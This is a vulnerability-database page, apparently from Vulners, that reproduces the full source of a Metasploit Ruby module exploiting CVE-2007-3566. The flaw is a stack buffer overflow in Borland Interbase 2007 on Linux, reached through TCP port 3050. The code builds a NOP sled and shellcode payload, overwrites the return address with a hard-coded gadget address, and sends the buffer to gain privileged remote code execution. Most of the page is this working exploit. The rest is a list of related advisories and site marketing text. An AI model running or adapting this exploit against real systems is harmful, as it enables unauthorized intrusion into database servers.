Vulners
Lucene search
interbase_create.rb.txt
🗓️ 08 Aug 2007 00:00:00Reported by Ramon de C ValleType 
packetstorm🔗 packetstormsecurity.com👁 34 Views
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Immunity Canvas: BORLAND_IB | 26 Jul 200718:30 | – | canvas |
 | CVE-2007-3566 | 15 Jun 201000:00 | – | circl |
 | Borland Interbase Database Service Create-Request Buffer Overflow (CVE-2007-3566) | 18 Oct 200700:00 | – | checkpoint_advisories |
 | CVE-2007-3566 | 26 Jul 200718:00 | – | cve |
 | CVE-2007-3566 | 26 Jul 200718:00 | – | cvelist |
 | Borland Interbase - 'Create-Request' Remote Buffer Overflow (Metasploit) | 15 Jun 201000:00 | – | exploitdb |
 | Borland Interbase Create-Request Buffer Overflow | 26 Jul 200701:26 | – | metasploit |
 | CVE-2007-3566 | 26 Jul 200718:30 | – | nvd |
| Borland Interbase Create-Request Buffer Overflow | 26 Nov 200900:00 | – | packetstorm |
 | Stack overflow | 26 Jul 200718:30 | – | prion |
10
`##
# $Id: interbase_create.rb 5068 2007-07-31 02:10:49Z ramon $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Linux::Misc::Interbase_Create < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Borland Interbase 2007 Create Request Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Borland Interbase 2007
by sending a specially crafted create request.
},
'Version' => '$Revision: 5068 $',
'Author' =>
[
'Ramon de Carvalho Valle <[email protected]>',
'Adriano Lima <[email protected]>',
],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-13' ],
[ 'CVE', '2007-3566' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 120,
},
'Targets' =>
[
#
# /opt/interbase/bin/ibserver
#
# 804cbe4: 5e pop %esi
# 804cbe5: 5d pop %ebp
# 804cbe6: c3 ret
#
[ 'Linux - Borland Interbase 2007 Server Edition', { 'Ret' => 0x804cbe4 } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(3050)
],
self.class
)
end
def exploit
connect
# Create request
buf = [0x14].pack('N')
# Id
buf << [0x03].pack('N')
# Size
buf << [0x220].pack('N')
# It will return into this nop block
buf << make_nops(0x21c - payload.encoded.length)
# Payload
buf << payload.encoded
print_status("Payload encoded size is #{payload.encoded.length} bytes.")
# Target
buf << [target.ret].pack('V')
# Padding
buf << rand_text_english(32 * 1024)
sock.put(buf)
sleep(2)
handler
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Aug 2007 00:00Current
EPSS0.79683